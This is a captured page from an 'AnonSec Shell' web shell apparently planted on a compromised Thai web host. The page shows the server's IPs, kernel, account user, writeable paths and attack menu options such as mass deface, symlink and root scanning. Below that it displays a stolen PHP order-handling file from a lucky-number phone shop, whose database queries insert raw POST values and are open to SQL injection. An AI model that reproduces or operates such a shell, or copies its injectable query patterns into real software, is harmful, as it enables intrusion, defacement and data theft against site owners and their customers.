AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 172.71.28.145   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/simded.com/mybackend/orders/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/simded.com/mybackend/orders/edit_save.php
<?php require_once("../include/class.php");?>
<?php include("table_name.php");?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php include("../include/mail.php");?>


<?php
$_SESSION['er'] = 'true';
$from = '[email protected]';
$date = date("Y-m-d H:i:s");

if($_POST["Pmid"])
{
	$list = array(	
			'table'=>'orders',
			'id'=>$_POST['id'],
			'id_pm'=>$_POST["Pmid"],
			'sp_type'=>$_POST["spt_id"],
			'up_date'=>date("Y-m-d H:i:s")
		);	  
		$add = $actiondata_db->edit_db($list);
}



if($_POST["status"]==5)//ยกเลิกเบอกกลับ มา ว่าง(1) 
{
	$list1 = array('table'=>'order_detail','where'=>'id_order = "'.$_POST['id'].'"','order'=> "ORDER BY id ASC");				  
	$view1 = $view_db->view($list1);
	$result1 = $view_db->q_re($view1);
	while($row1 = $view_db->q_ro($result1))
	{
		$list = array(	
			'table'=>'phonenumber',
			'id'=>$row1["id_pho"],
			'status_number'=>1,//ยกเลิกเบอกกลับ มา ว่าง(1) 
			'up_date'=>date("Y-m-d H:i:s")
		);	  
		$add = $actiondata_db->edit_db($list);
	}
}


	$to = $_POST['mail'];
	$sql = array('table'=>'orders','where'=>"id = '". $_POST["id"] ."'");
	$view_sql = $view_db->view($sql);
	$row = $view_db->q($view_sql);
	$id_order = sprintf("%06d",$_POST["id"]);
	
	
	if($_POST["status"]==2)
	{
		$sub = 'ยืนยันการสั่งซื้อเบอร์มงคล';
		//$msg = $_POST['detail'];
		include('confirm.php');
		

		$list1 = array('table'=>'order_detail','where'=>'id_order = "'.$_POST['id'].'"','order'=> "ORDER BY id ASC");				  
		$view1 = $view_db->view($list1);
		$result1 = $view_db->q_re($view1);
		while($row1 = $view_db->q_ro($result1))
		{
			$list = array(	
				'table'=>'phonenumber',
				'id'=>$row1["id_pho"],
				'status_number'=>3,//จองเบอร์ 
				'up_date'=>date("Y-m-d H:i:s")
			);	  
			$add = $actiondata_db->edit_db($list);
			//print_r($add);
		}
		

		
	}
	if($_POST["deliverycode"])
	{
		if($_POST['spt_id'] == 1)
		{
			$spt = 'ทาง www.kainumber.com ได้ทำการจัดส่งสินค้าให้ท่านทางไปรษณีย์ พัสดุไปรษณีย์ภายในประเทศ เรียบร้อยแล้ว
			ท่านสามารถตรวจสอบสถานการณ์จัดส่งได้ที่เบอร์ Call Center ของไปรษณีย์ 1545 หรือที่ทำการไปรษณีย์ปลายทาง
			เลขที่ติดตามพัสดุ (Tracking Number ) <font color="#FF0000"> '.$_POST["deliverycode"].' </font><br>';
		}
		if($_POST['spt_id'] == 2)
		{
			$spt = 'ทาง www.kainumber.com ได้ทำการจัดส่งสินค้าให้ท่านทางไปรษณีย์ พัสดุไปรษณีย์ลงทะเบียน เรียบร้อยแล้ว
	ท่านสามารถตรวจสอบสถานการณ์จัดส่งได้ที่ <a href="http://track.thailandpost.co.th/">http://track.thailandpost.co.th/</a>
	เลขที่ติดตามพัสดุ (Tracking Number ) <font color="#FF0000"> '.$_POST["deliverycode"].' </font><br>';
		}
		if($_POST['spt_id'] == 3)
		{
			$spt = 'ทาง www.kainumber.com ได้ทำการจัดส่งสินค้าให้ท่านทางไปรษณีย์ พัสดุไปรษณีย์ด่วนพิเศษ (EMS) เรียบร้อยแล้ว
	ท่านสามารถตรวจสอบสถานการณ์จัดส่งได้ที่ <a href="http://track.thailandpost.co.th/">http://track.thailandpost.co.th/</a>
	เลขที่ติดตามพัสดุ (Tracking Number ) <font color="#FF0000"> '.$_POST["deliverycode"].' </font><br>';
		}
		if($_POST['spt_id'] == 4)
		{
			$spt = 'ทาง www.kainumber.com ได้ทำการจัดส่งสินค้าให้ท่านทาง Kerry Express  เรียบร้อยแล้ว
	ท่านสามารถตรวจสอบสถานการณ์จัดส่งได้ที่  <a href="http://th.ke.rnd.kerrylogistics.com/shipmenttracking">http://th.ke.rnd.kerrylogistics.com/shipmenttracking</a>
	เลขที่ติดตามพัสดุ (Tracking Number ) <font color="#FF0000"> '.$_POST["deliverycode"].' </font><br>';
		}	
	}
	
	
	if($_POST["status"]==3)
	{
		//ส่งเมลtracking	
		$sub = 'ยืนยันการส่งสินค้า';
		include('deliver.php');
	}
	if($_POST["status"]==4)
	{
		//ส่งเมลขอบคุณ
		$sub = 'ขอบคุณที่ใช่บริการ';
		include('messenger.php');
	}
	if($_POST["status"] == 3 || $_POST["status"] == 4)
	{
		$list1 = array('table'=>'order_detail','where'=>'id_order = "'.$_POST['id'].'"','order'=> "ORDER BY id ASC");				  
		$view1 = $view_db->view($list1);
		$result1 = $view_db->q_re($view1);
		while($row1 = $view_db->q_ro($result1))
		{
			$list = array(	
				'table'=>'phonenumber',
				'id'=>$row1["id_pho"],
				'status_number'=>2,//ขายแล้ว 
				'up_date'=>date("Y-m-d H:i:s")
			);	  
			$add = $actiondata_db->edit_db($list);
			//print_r($add);
			//exit;
		}
	}
	

	
if(($_POST["status"]==2 || $_POST["status"]==3 ||$_POST["status"]==4 )&& $_POST["s_mail"]==1)
{	
	
	
	$mail->SetFrom($from, $from);
	$mail->AddReplyTo($from, $from);
	
	$today = 'วันที่ &nbsp;' . date('d/m/Y').'<br>';
	$you = 'เรียนคุณ ' . $row['name'].' '.$row['lastname'].'<br><br><br>';
	
	
	
	
	
	$body = $sub.'<br><br>'.$today.$you.$msg.$contact;
	
	$mail->MsgHTML($body);
	$txt = 'อาจารย์ไก่ เบอร์มงคล :: '.$sub;
	$mail->Subject = $txt;
	$mail->AddAddress($to); // ผู้รับ
	$mail->addBCC('[email protected]'); // ผู้รับ
	$mail->addBCC('[email protected]'); // ผู้รับ
	$mail->addBCC('[email protected]');  // ผู้รับ
	//$mail->AddAddress('[email protected]'); // ผู้รับ
	//exit;
	//print_r('dd');
	if(!$mail->Send()) 
	{
		//echo "<meta http-equiv=\"refresh\" content=\"0; url=../main/index.php?menu=7&&msg=2\">";
		echo "<br> Mailer Error: " . $mail->ErrorInfo;
		unset($_SESSION['er']);
		exit();
	}
	else
	{
			$_SESSION['er'] = 'true-mail';
	}
}



$list = array(	
			'table'=>$name_table,
			'id'=>$_POST["id"],
			'status'=>$_POST["status"],
			'deliverycode'=>$_POST["deliverycode"],
			'up_date'=>date("Y-m-d H:i:s"),
			'status_op'=>2,
		);
			  
		$add = $actiondata_db->edit_db($list);
	//print_r($add);	  

	
//print_r($_POST);
//exit;
	
	
	
	
	if( $add['suc'] <> 1)
	{
		$_SESSION['er'] = 'false';
	}
?>
<meta http-equiv="refresh" content="0;URL=list.php">
<?php
exit;
?>

Anon7 - 2022
AnonSec Team